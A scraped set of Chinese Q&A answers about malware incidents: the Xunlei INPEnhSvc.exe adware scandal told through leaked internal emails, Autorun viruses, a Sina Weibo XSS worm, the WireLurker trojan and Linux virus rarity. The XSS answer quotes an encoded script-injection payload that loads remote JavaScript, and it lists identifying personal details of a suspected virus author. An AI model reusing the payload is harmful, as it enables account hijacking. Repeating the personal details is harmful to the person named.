一看到这个问题,就想到我一个朋友在09年发现的一个病毒,据他说流传的很广,而且当时他可能是全网第一个发现者(他的知乎账号
)。病毒分析报告在他QQ空间的日志里,很精彩,下面搬运过来:/*长文预警!好多人说看不下去这么多代码,确实代码…
360不就是以毒攻毒吗?
360不就是以毒攻毒吗?
来自子话题:
在那遥远的 win95/98 时代,有个叫 CIH 的传说
在那遥远的 win95/98 时代,有个叫 CIH 的传说
以下为雷锋网 2013 年 8 月 1 日文章(目前已被删除),摘自谷歌缓存:&br&&br&&b&《迅雷惊现“掘雷者”
高层包庇共谋私利》&/b&&br&&br&继京东商城那位叫吴声的同志首创了“食京者”后,迅雷也出现了“掘雷者”。近日,迅雷看看就有高层利用职务之便对看看的用户进行了病毒般的强制插入,捆绑了众多软件,行为极其恶劣,已构成了职业犯罪。但可笑的是,这个事在迅雷内部竟然没起任何波澜。&br&&br&不知道是公司反应慢,还是这些人只手遮天的能力实在太强。不多说了,看下边内容。(编者注:以下内容为迅雷内部针对此事的内部邮件)&br&&br&&ul&&li&&b&邮件一&/b&&br&&/li&&/ul&&br&这封邮件是工作人员在收到迅雷看看的用户反馈,分析后发送邮件抄送迅雷各大高管以及迅雷看看高管,认为此事件是给用户安插病毒,给个别人谋取私利。&br&&blockquote&昨天接到用户反馈,发现一个位于 C:\Windows\System32 目录下,名为 “INPEnhSvc.exe” 带有迅雷数字签名的文件。(见附件INPEnhSvc.exe)&br&&br&我们从用户机器上将此文件取回,经技术人员逆向分析,发现该文件有病毒行为。&br&&br&“INPEnhSvc.exe” 是一个服务,加 /regserver 参数可注册启动。&br&&br&启动后有3次服务器连接,访问2个域名分别为: &br&&a href=&http://conf.& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&conf.&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&(下发配置文件)&br&&a href=&http://kkyouxi.& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&kkyouxi.&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&从&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&中拉取2个配置文件。(见附件1 2 3.txt)&br&&br&1.txt 配置了程序行为,检测到 “taskmgr.exe|tasklist.exe|procexp.exe|procmon.exe|devenv.exe|windbg.exe|filemon.exe|ollyice.exe|ollydbg.exe|processspy.exe|spyxx.exe|cv.exe|wireshark.exe” 等分析工具会自动退出,防止被发现。&br&&br&2.txt 配置了如下 apk,满足某些条件,该程序会后台下载安装 adb(安卓手机驱动),并将如下 APK 自动安装到连接至当前计算机的手机上。&br&&a href=&http://down4./wm/4/4/JYqpdtV2.0.0.38_ddz_Android_Build_& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&down4./wm/4/4&/span&&span class=&invisible&&/JYqpdtV2.0.0.38_ddz_Android_Build_&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&0bd246.apk(九游棋牌大厅)&br&&a href=&http://dl./business/91soft/91assistant_Andphone_lite134.apk& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&dl./business/9&/span&&span class=&invisible&&1soft/91assistant_Andphone_lite134.apk&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&(91手机助手)&br&&a href=&/360sj/adm/apk//com.qihoo.appstore& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/360&/span&&span class=&invisible&&sj/adm/apk//com.qihoo.appstore&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&_149.apk(360手机助手)&br&&a href=&/down/1263/uuwldh_1263.apk& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/down/126&/span&&span class=&invisible&&3/uuwldh_1263.apk&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&(UU网络电话)&br&&a href=&/gfan/product/a/gfanmobile/beta/GfanMobile_web414.apk& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/gfan/prod&/span&&span class=&invisible&&uct/a/gfanmobile/beta/GfanMobile_web414.apk&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& (机锋应用市场) &br&&br&程序内还有”设置IE首页、创建桌面快捷方式、添加IE收藏夹“等行为,都由 2.txt 这个配置文件配置。&br&&br&外界已经有人注意到该文件,我们昨天已经排除文件通过迅雷7客户端部署的可能性,但由于带有迅雷数字签名,会导致用户迁怒于迅雷7,将迅雷7卸载。&/blockquote&&br&&ul&&li&&b&邮件二&/b&&br&&/li&&/ul&&br&这封邮件是迅雷开发部门一位高管非常愤怒,将此邮件上升了高度,并认为有人在利用职务之便进行商业犯罪,要求彻查此事。&br&&blockquote&发现带有迅雷数字签名的未知文件,经分析有病毒行为我和我的小伙伴们都惊呆了!!代表迅雷的一名开发人员表示震惊和愤怒!!!!&br&&br&从该exe的特征和行为来看,属于典型的后门软件和病毒,并且使用类似云指令的技术来强制后台推送用户不需要的东西,来达到不可告人的目的,堂堂迅雷竟然能出现如此无耻下流的软件,若被杀毒软件拦截列入黑名单,后果不堪设想,迅雷长期积累的信誉将毁于一旦!迅雷公司的数字签名也可能陷入万劫不复的境地,祸及公司广大的产品包括迅雷7、xmp以及BOLT引擎等等众多产品和模块,不能不让人震惊!&br&&br&该软件带有迅雷数字签名,只有两种情况,一种是泄露数字签名导致,一种是内部员工和团伙所为。从规模来看,涉及到客户端开发(并且具有一定的反逆向保护)、外网服务器,云指令推送,服务器管理后台等技术,并且使用了&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&的域名,推送apk肯定还涉及商业利益链包括揽活、销赃等,所以可以确定内部团伙作案的可能性非常大,凭一己之力很难做到这么大规模,并且外网高手即使有数字签名,也不大可同时控制&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&下的域名。&br&&br&客户端样本我也拿到一份,不得不说可笑,只凭此鸡鸣狗盗的雕虫小技就想鱼目混珠,瞒天过海?置迅雷的广大开发人员于何处?后台自动下载apk强制安装,众所周知当前手机应用推广的利润率惊人,单次安装激活就有1元到数元,所以这个软件究竟在发现之时已经散步到多大市场?后面的灰色利益链又是如何?幕后黑手又是谁?&br&&br&从google搜索结果来看,外网已经有众多用户反馈和抱怨,从反馈用户的ip来看,多是出于二三线小城市,真是用心良苦!!!如果是内部员工所为,那么作为迅雷的开发人员,以权谋私,利用公司的渠道尤其是下载部的迅雷7来满足私欲,为所欲为,不计后果,缺乏最基本的职业素质,令人不齿!&br&&br&恳请公司彻查此事,给所有开发人员一个交代: &br&&br&1.请专业杀毒软件公司比如金山来分析病毒样本,出具病毒分析报告&br&&br&2.从&a href=&http://kkyouxi.& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&kkyouxi.&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&域名出发,顺藤摸瓜找出作案人&br&&br&3.发掘该病毒的利益链条,找出幕后黑手&br&&br&4.严格控制数字签名,采用更安全的机制来控制签名流程,保证所有被签名文件可回溯,杜绝可能的数字签名泄露&/blockquote&&br&&ul&&li&&b&邮件三&/b&&br&&/li&&/ul&&br&这封邮件是迅雷看看先是找了某中层出来顶罪,并找各种理由来搪塞。&br&&blockquote&首先先给大家道歉一下,此次事故是近期我们推出的OFFICE插件的产品BUG所导致的问题,INPEnhSvc.exe是Office插件系统的守护程序,负责拉取配置与上报统计;INPEnhUD.exe是自升级程序,负责拉取升级配置升级Office插件系统。但旧版本的升级程序有Bug,导致守护程序不存在时拉起会弹框报错,守护程序自身也有内存泄漏的问题,所以在25号发了一个自升级版本修复这两个问题,降低对用户的影响,目前产品还在持续完善中。 &br&&br&至于推送九游棋牌大厅、91手机助手、360手机助手、UU网络电话、机锋应用市场的事情,是之前经过F总审批用于置换对应平台广告位置,来推广无线看看APK之用。2013年我们设定的无线看看的日新增目标数量达 到15万每天,根据之前邮件中的价格1元到数元来看的话,那么一天就是15万元RMB起,一个月就是450万,一年就是5400万RMB。而公司给到的预算只有800万用于无线推广,目前还都用在了和品牌硬件厂商合作预装上面,如果不通过换量很难完成任务目标。同时,迅雷所有无线产品的量都非常小,很难实现等价兑换,无奈之下才破例采取插件推送的形式进行换量操作。&br&&br&其中九游棋牌大厅为UC浏览器的产品,其他的就不用介绍了,通过帮他们推广手机端应用,他们来帮我们推广无线看看,达到换量的目的。从实际效果来看,我们帮他们带量的情况很不乐观,部分平台仅为他们帮我们带量的十分之一。下面是他们帮我们推广产品的截图,带量情况及推广的排期表(实际执行远大于这些排期),请大家查看!&br&&br&最后,由于功能BUG给用户带来的问题,我们25号的升级版本已经解决,目前正在升级中,在此我们也深表歉意。但是仍然由衷希望大家在没调查好事实真相前,不要随意猜测,这样不仅影响内部团结,而且不利于解决已经发生和未来有可能会出现的问题,谢谢!&/blockquote&&br&&ul&&li&&b&邮件四&/b&&br&&/li&&/ul&&br&这封邮件是迅雷客户端一位高管对迅雷看看中层顶罪表示愤怒,并将该事危害程度拔高。&br&&blockquote&作为迅雷客户端的维护人员,无论是谁出于何种初衷通过何种手段部署了这个程序,从结果上来看,迅雷客户端的声誉已经首当其冲的受到了严重损害,已经成为用户怒而卸载迅雷的原因,已是我的职责所在,很关心这个事情的进展。&br&&br&现在已经澄清了是业务团队为了更好的实现置换推广为之,并非严重的安全问题。本来可以藏的很好,不被用户,甚至自家的开发人员感知,只是因为出了内存泄漏的bug才被大家关注起来,把bug解了这事就解决了?能否定这是一种病毒行为?藏的再好,也怕用户找;杀毒软件现在没报,以后就不会报?现在反馈的少,以互联网的传播速度也许哪天就大爆炸。&br&&br&及早被发现难道不是好事?迅雷平台有很多更加正常,更加优雅,更加对用户友好的的推广渠道,为何不考虑? 看一下这个程序的行为:带着迅雷的数字签名,以迅雷的名声作保,做的是静默下载并且安装App到用户手机,更改用户收藏夹之类的事情,加上一些反调试保护,无法停用无法删除。&br&&br&这是严重伤害用户体验的活脱脱的病毒行为,不知情的开发人员看到这种程序的第一想法一定是“这是个病毒呀,迅雷不应该干这个,太伤名声了”,“谁为了啥干的”之类的猜测是非常正常的,为公司利益着想讨论问题细节并且希望彻查以儆效尤为先而作言,而不是为了所谓团结而沉默。&br&&br&置换推广的策略是非常正确的,我想这也是领导审批通过的原因吧。但是执行手段是这样的病毒行为,和公司推行用户体验至上的原则是背道而驰的。&br&&br&迅雷一丝一毫的用户体验改进都是各位同学殚精竭虑通宵达旦的辛苦付出得来的,迅雷一点一滴的用户口碑积累都是经年累月长期沉淀出来的,为了节省金钱和时间成本,采用这样的手段,对用户体验和迅雷口碑的伤害难道不是让公司付出了更大的成本?不是审毫毛小计而遗天下大数?岂非饮鸩止渴杀鸡取卵,涸泽而渔焚林而猎?&br&&br&如果这样的行为被认可,必然有人趋之如骛,置公司的整体利益于何地,其他同学的劳动于何地?想到这个令人不寒而栗。&br&&br&由衷希望以病毒形式来推广的做法立即停止,而不是改了bug继续来。 位微言轻,不吐不快。&/blockquote&&br&&ul&&li&&b&邮件五&/b&&br&&/li&&/ul&&br&这封邮件是迅雷看看某高管将此事定性为业绩压力太大所致。&br&&blockquote&此次事故来自业绩压力所为,初衷是为了推广公司的无线产品,执行方式虽是无奈之举,但是确实伤害了用户体验,目前已经全面停止,后续将不会出现类似的情况,避免给公司带来损失,后续还请大家多多监督。&/blockquote&&br&&ul&&li&&b&邮件六&/b&&br&&/li&&/ul&&br&这封邮件是迅雷看看大boss再度对此事开脱。&br&&blockquote&首先,作为看看的负责人,这次的事情给了我一个深刻的教训,侥幸心理不能存在,对待任何事情都要思考得更全面。&br&&br&一方面,同意程浩的处罚规定,另一方面,看看开始就这次的事件建立起类似事情的流程,有监控的流程,相信至少很多误解不会存在。&br&&br&这个在一到两周内会给到大家结果。&br&&br&同时,从这次的邮件,我想提几个也许更深层次的问题:&br&&br&1、业务部门的发展需要大家的帮助和支持,这次的事件就属于高压力高考核下又找不到解决途径后,憋出来的烂招,结果是大家都受到了连累。&br&&br&我希望能借此事件将看看这边的一些急需的帮助提出来,大家一起探讨。 &br&&br&所谓堵不如梳,有大家一起帮忙,相信类似事件从驱动力上就会小很多。 &br&&br&看到大家很激动的情绪,相信大家都很想为公司好,为用户好,那么大家就一起参与,不如我们从根上去解决问题? &br&&br&2、欢迎大家提出意见和表达意见以及希望看到的结果,但是,还是希望大家不要乱猜测和猜疑,甚至匆忙间就把判定给下了,尤其是一些原则的问题上。&br&&br&这是一封公开邮件,公开邮件有话语人,就有听众,属于媒体性很强的邮件表达方式。&br&&br&在业务上推动用的方法不对是一回事,为自己谋私利是另外一件事情。两者最后的落点完全不一样。&br&&br&希望以后大家在这样类似的邮件里注意这个点,不是说不允许大家说,而是一些很重要的判断,可以先弄明白再表达观点。&br&&br&3、最后,想给大家说一说大家所不了解的看看一些情况。&br&&br&看看的发展其实我想很多人不了解,我也知道看看最近在受到很多公司其他部门的质疑,有发展问题,有团队问题,有管理问题,有道德问题,有产品问题……&br&&br&这里作为看看的负责人,我想也就此邮件为看看做一次简短的宣讲。&br&&br&在优酷土豆既定好赛道的长跑里,我们是跟得最辛苦的一家视频穷公司 &br&&br&我们用最少的花费版权的钱,得到了跟每一家视频公司差不多的内容(除开对方有钱可以做独家,除开MMPA打死不卖给我们的内容)&br&&br&我们用最少的市场费用现在做到了每天从外部给看看带量750万UV,这个上面我们是市场的第一名 &br&&br&我们用最少的人数在运营着视频门户的红海广告商业模式,一个从技术到产品到内容到市场到销售到编辑到成本控制都要面面俱到的商业模式。&br&&br&我们用最低的薪资待遇团聚着一帮对迅雷对迅雷看看还有感情的弟兄们,在艰苦奋斗&br&&br&……………………&br&&br&这样的模式下,整个团队发挥出的就是以前继承下来的土匪精神和强烈的生存欲望。&br&&br&这个相对应的,也造成了很多的不规范和给兄弟部门带来很大的困扰,&br&&br&这一点,是以后看看要杜绝和规范起来的。请大家相信 &br&&br&尽管跟得困难,但是不意味着我们就一定要傻傻的跟随到底,看看在未来的一两年内,还是一个基础目标,活下去!&br&&br&在活着的过程中,不断的寻找机会,给自己补血的同时看能不能找出属于自己的特殊赛道,这个是我最大的职责和责任。请大家相信,我能给大家一个满意的答案。&br&&br&希望在这个过程里,还是能得到大家的帮助和谅解&br&&br&最后,尽管大家的邮件里的质疑很尖锐,但是,至少有一点,对迅雷的感情从字里行间我能看到。&br&&br&我刚生的女儿,在医院里,医生的态度稍微有点不负责的时候,我也是怒火中烧的,所以,对大家的心情我也非常理解。&br&&br&所以,既然大家都把迅雷当做自己的孩子,真心的爱护和呵护,那我们不妨一起努力,寻找更好的方式来一起解决问题。&br&&br&一直以来,迅雷看看也是迅雷的一部分.&br&&br&我说几句:&br&&br&1、我们看看业务面临非常大的压力,这点我能理解并感同身受,其实不光是看看,其他产品也有。&br&&br&2、在有中国特色的商业伦理和“成功哲学”下,确实有些公司通过一些不规范的手段获得了巨大的商业利益,但是这不意味着我们应该效仿,我们总是有一条底线要坚守。&br&&br&3、知错就改是好事,但是不足够,犯了错误就要付出一些代价。 我们没能在公司内部树立一个核心价值观,是我的问题,我自罚30%月薪。另外看看的管理层也一并做出处罚,总的罚金池要match我的。具体请anter了解清楚事情原委后分配。所有罚金由peter暂管,未来进入看看的团队建设费用。 请peter安排HR同事来具体follow up一下。&/blockquote&&br&未完待续……不知道还会有什么样的人出来玩什么手段和说辞,如果有的话,我会持续更新。谢谢关注。 &br&&br&&ul&&li&&b&结语&/b&&br&&/li&&/ul&&br&迅雷看看拥有几亿的用户,此事牵扯到的黑色利益链条到底有多少?但此事竟然将在迅雷看看内部不了了之。无人挨罚,无人顶罪,无人遭辞,无人隐退,长此以往,迅雷必亡。
以下为雷锋网 2013 年 8 月 1 日文章(目前已被删除),摘自谷歌缓存:《迅雷惊现“掘雷者” 高层包庇共谋私利》继京东商城那位叫吴声的同志首创了“食京者”后,迅雷也出现了“掘雷者”。近日,迅雷看看就有高层利用职务之便对看看的用户进行了病毒般的强…
【背完日语单词了,这是最后一次更新】&br&我发现我并没有挑明观点,那么观点总结如下:&br&&a class=&member_mention& data-editable=&true& data-title=&@杨作会& data-hash=&aaad3fbfe4b1& href=&/people/aaad3fbfe4b1& data-tip=&p$b$aaad3fbfe4b1&&@杨作会&/a& 提供:&b&该文件数字签名通过了系统的验证,可以确定是迅雷公司写的。&/b&&br&&b&感谢指出行文错误,深夜叨扰,祝晚安。&/b&&br&&br&&br&第一、在评论92楼杨sama给的样本文件,通过HEDIT的确能看见迅雷看看的网址,&b&迅雷对于这事儿难逃其咎。&/b&&br&第二、这玩意儿连个系统内核都没进,危害完全没有那篇破报道里说的那么大, 那篇报道纯属抹黑成分远远大于叙述事实成分,&b&但是提供的样本文件的确与迅雷有关系&/b&&br&第三、&b&给的那个样本远远没有杀毒软件里藏的那些玩意对你的计算机危害大&/b&&br&第四、&b&我自己调试的结果&/b&是没有发现什么危险的API CALL,鉴于本人逆向水平实在令人捉急,这条&b&不能作为那个东西没危害的依据。&/b&&br&纯白交响曲爱理线去了,おやすみなさい、じゃね、みんなさん。&br&&br&&b&特别注意:我原来的答案(已被我自己删除)中给的答案中带有倾向性,倾向性是:迅雷干这事儿的可能性&u&&i&很小小到了近乎没有的程度。&/i&&/u&&/b&&br&&b&后来的事实证明,迅雷公司的下限超出了我的想象。因此这个倾向是明显错误的,敬请各位注意(也不知道你们还能不能看到了……)&/b&&br&&br&&b&原错误答案由于带有过强的倾向性我感觉会导致强烈误导,已被我删除。&/b&&br&&b&经过分析得出的观点上文已经说完了。&/b&&br&&br&&b&特别感谢92楼评论者提供病毒样本&/b&&br&&b&特别感谢&a class=&member_mention& data-editable=&true& data-title=&@杨作会& data-hash=&aaad3fbfe4b1& href=&/people/aaad3fbfe4b1& data-tip=&p$b$aaad3fbfe4b1&&@杨作会&/a& 指出文中错误并做知识补充。&/b&
【背完日语单词了,这是最后一次更新】我发现我并没有挑明观点,那么观点总结如下: 提供:该文件数字签名通过了系统的验证,可以确定是迅雷公司写的。感谢指出行文错误,深夜叨扰,祝晚安。第一、在评论92楼杨sama给的样本文件,通过HEDIT的确能看…
能。&br&&br&我五年级的时候,整天泡在小学的机房搞NOIP。那时候正好流行Autorun病毒,U盘那时候还是新兴的东西(至少当时的我还在拿着一张3.5inch双面高密度软盘满学校乱跑呢),Autorun病毒们就借着U盘和局域网还有装了硬盘保护系统从而没法打补丁(但是有几个分区是没有保护的所以病毒得以留存)的Windows XP满世界传播。&br&&br&但是Autorun病毒的入口点只有一个:autorun.inf(至少当时还是如此)。所以,不同病毒之间会互相争抢这个入口点,有时候就会出现autorun.inf被改动从而找不到文件的情况(互相攻击,互相删文件)。当时年幼的我用了四年级时候百度而得的显示属性为+S+H+R的文件的方法和一点点英语能力,顺利找到了病毒的运行机理。&br&&br&然后我写了个.bat把整个机房的残余病毒文件杀光光了。满满的成就感。
能。我五年级的时候,整天泡在小学的机房搞NOIP。那时候正好流行Autorun病毒,U盘那时候还是新兴的东西(至少当时的我还在拿着一张3.5inch双面高密度软盘满学校乱跑呢),Autorun病毒们就借着U盘和局域网还有装了硬盘保护系统从而没法打补丁(但是有几个分…
&a href=&/images/t.js& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&/images/t.js&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&XSS代码:&a href=&/pub/star/g/xyyyd%22%3e%3cscript%20src=//www& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/pub/star/g/xy&/span&&span class=&invisible&&yyd%22%3e%3cscript%20src=//www&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update&br&&br&新浪名人堂部分XSS过滤不严&br&&br&攻击原理分析:&a href=&http://d.pr/Flsl& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/Flsl&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&源 .js 文件内容:&a href=&http://d.pr/rHiB& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&d.pr/rHiB&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&
(海均提供)&br&&br&========================================&br&&br&病毒作者微博
&a href=&/n/hellosamy& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/n/hellosamy&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a& (已河蟹)&br&遗照 &a href=&/zjc5s4.jpg& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&/zjc5s4&/span&&span class=&invisible&&.jpg&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&&br&&br&Domain Name: &a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&Registrant Organization: 北京新网数码信息技术有限公司&br&Registrant Name: 张志 &br&Administrative Email: &br&&br&疑似病毒作者信息:&br&I D名:lin5-61&br&真实姓名:朝森&br&性别:男&br&毕业院校及专业:武汉科技大学&br&职业:写代码(JAVA)&br&联系方式:QQ&br&&br&QQ空间: &a href=&http://user./& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&user./46142&/span&&span class=&invisible&&932&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a& &br&问题:我是哪里人?&br&回答:海南。
脚本 XSS代码:.病毒地址.cn/images/t.js%3e%3c/script%3e?type=update新浪名人堂部分XSS过滤不严攻击原理分析:源 .js 文件内容: (海均提供)=======================…
我确实认识一些不装安全软件的人。但他们都非常了解了解各种入侵手段,了解安全软件的利弊,了解在不装安全软件的情况下如何安全地使用计算机。&br&&br&但一般来说,不确定自己是不是应该装安全软件的人,都应该装安全软件。
我确实认识一些不装安全软件的人。但他们都非常了解了解各种入侵手段,了解安全软件的利弊,了解在不装安全软件的情况下如何安全地使用计算机。但一般来说,不确定自己是不是应该装安全软件的人,都应该装安全软件。
“搞计算机的,不过不会修电脑”。
“搞计算机的,不过不会修电脑”。
&p&这种「回了条短信→银行卡被盗刷」神奇故事的完整情节一般是这样:&/p&&p&回了条短信→点了个链接→进了假网银网购地址或者中了手机病毒→填了卡号密码→银行卡被盗刷。&/p&&br&&p&这就是为什么你小时候写数学题只写答案不写过程老师会毫不犹豫给你扣分的原因。&/p&&br&&p&只回复短信不可能中毒。要么是点了链接访问了钓鱼网站填了卡号密码,要么就是点了链接下载了木马导致银行卡信息被盗取。&/p&&br&&p&给大家安利一个微博帐号:江宁公安在线,暨江宁公安局官微,非常暖心的一个微博,还时不时辟一下各种流传于朋友圈的脑残谣。上面那些话就是它对这篇文章的辟谣。&/p&&br&&p&另外,这个「好奇实验室」微信号和知乎上那个是不是同一个?如果是的话,那么这种打着科普旗号组织还发这种不经证实的东西,实在是太不负责任了。&/p&
这种「回了条短信→银行卡被盗刷」神奇故事的完整情节一般是这样:回了条短信→点了个链接→进了假网银网购地址或者中了手机病毒→填了卡号密码→银行卡被盗刷。这就是为什么你小时候写数学题只写答案不写过程老师会毫不犹豫给你扣分的原因。只回复短信不可…
睡前看到有些不靠谱回答忍不住爬起来说下。&br&&br&Updated 11.7:&br&&br&AlienVault提供了新的PC上的WireLurker样本,该木马伪装成“绿色IPA安装器”,通过usb向连接越狱的iOS设备上安装木马。同时该样本中有更多木马作者和X芽地相关联的证据。ref: &a href=&/2014/11/wirelurker-windows/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&WireLurker for Windows&i class=&icon-external&&&/i&&/a&&br&&br&Wireluker的中控服务器已经下线,Apple也吊销了其安装应用所使用的企业开发者证书。但是倒了一个wireluker,千千万万个wireluker站起来,不要低估国人的模仿能力。这次如果木马作者和利益群体得不到惩处,只会有更多人这么干。而且从央视幸灾乐祸的报道来看,似乎zf也无意深究此事。&br&&br&部分事件原文请见 &a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&引用部分如下:&br&&blockquote&&p&【 发布】&br&最近我所有未越狱的 &em&iOS&/em& 设备都出现了一个怪现象:&br&与 Mac 同步之后会莫名出现若干企业应用。&br&第一次是 5 月 21 日出现的“PP助手正版”(下图),&br&接着一周后出现了“乱世之刃2”。&/p&&p&第二次出现奇怪的应用之时引起了我的注意。(头一次被我手快直接删除了)&br&首先在“描述文件”中皆出现了开发商证书(下图);&br&其次首次启动该应用会弹出确认。&/p&&/blockquote&&br&这个其实跟前段时间v2ex上曝光的machook木马是一个东西,目前普遍怀疑木马制作者DY在mXcx和X芽地网站分发的盗版OS X应用中插入了machook木马,有传闻木马作者和这两家公司有直接利益/雇佣关系(不可考)。比较搞笑的是在v2ex上发出曝光帖子之后,某网站的管理员忙不迭地发出律师贴要求v2ex删帖,简直是不打自招 =& &a href=&/t/144122& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&那个关于 Machook 木马社工的帖子删除了&i class=&icon-external&&&/i&&/a&&br&&br&该木马在OS X端除了自启动、和控制服务器通讯更新、请求root权限、对抗用户清除、盗取用户隐私信息这些PC时代木马通常的手段之外,引起轰动的是该木马&b&利用企业证书和itunes协议,向iPhone上安装木马,切实给未越狱的/越狱的iPhone带来了威胁。&/b&这不是什么新鲜的技术,完全是在未越狱/越狱的iPhone的技术框架允许范围之内,没有利用未知/已知漏洞。但是这庞大的一条黑色产业链和国人做黑产丰富的想象力,还是第一次曝光在公众面前。在非越狱的设备上,木马会通过企业证书静默安装&b&应用以做推广一些国产应用进而牟利。由于走了企业证书通道,木马甚至可以安装没有经过Apple Store Review的使用私有API的应用,和自行重打包的应用(有没有想到了Android上的重打包?),&/b&在越狱的iPhone上,这个木马就有了大很多的施展空间,行为包括注入感染所有新安装的应用、窃取淘宝、美图秀秀、支付宝数据,读取上传通讯录appid wifi名称 地址、劫持按键和网页浏览行为等等等等。&br&&br&Palo Alto发出的WireLurker分析文档还是很全面详细的,赞一个,有兴趣的可以仔细研读下 &a href=&/content/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&/co&/span&&span class=&invisible&&ntent/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&。 这篇文章里提到该木马已经演进了三个版本,在第二个版本中加入了感染iPhone的功能。&br&&br&这个问题也并不是Mac所独有的,因为windows上也可以通过同样的协议给配对的iOS设备安装应用,就像很多PC软件用adb给安卓手机安装应用一样。&br&&br&但是目前这件事在国内正逐渐往公关秀和添油加醋的报道上发展,至于这些由盗版软件带来的真正的威胁及应该进行的不要使用盗版软件的教育,和对木马制作者和相关方面的惩处,似乎有些消匿。全球黑色产业崭新的一页被媒体报道就变味了,央视的跟风报道由于记者缺乏专业素养,表达问题不清楚,将OSX第三方应用市场和iOS第三方应用市场混为一谈,很多人也压根不知道未越狱的iPhone通过企业证书途径是可以被静默安装应用的,导致很多人跟看笑话一样看这个新闻。&br&&br&木马清除方法:&a href=&/PaloAltoNetworks-BD/WireLurkerDetector& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&PaloAltoNetworks-BD/WireLurkerDetector · GitHub&i class=&icon-external&&&/i&&/a&&br&此外用little snitch等防火墙软件监控有没有进程连接到&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&,有则也是被感染的应用,将其删除。
睡前看到有些不靠谱回答忍不住爬起来说下。Updated 11.7:AlienVault提供了新的PC上的WireLurker样本,该木马伪装成“绿色IPA安装器”,通过usb向连接越狱的iOS设备上安装木马。同时该样本中有更多木马作者和X芽地相关联的证据。ref: …
&blockquote&Linux系统下的病毒少是为何?
——转载自《开源时代》第二期 &br&
可能不少人持这样一种观点,认为 Linux病毒少是因为Linux不像Windows那么普及,其实这种观点很早已经被人批驳过了,一个最有力的论据是:如果写病毒的人写 Windows病毒是因为 Windows 用户多而因此破坏性大,那么 Internet 上服务器大多是基于 Unix/Linux的,攻击这些服务器,破坏性岂不是更大么?
&br& 对一个二进制的 Linux 病毒,要感染可执行文件,这些可执行文件对启动这个病毒的用户一定要是可写的。而实际情况通常并不是这样的。实际情况通常是,程序被 root 拥有,用户通过无特权的帐号运行。而且,越是没有经验的用户,他拥有可执行文件的可能性就越小。因此,越是不了解这种危险的用户的主目录越
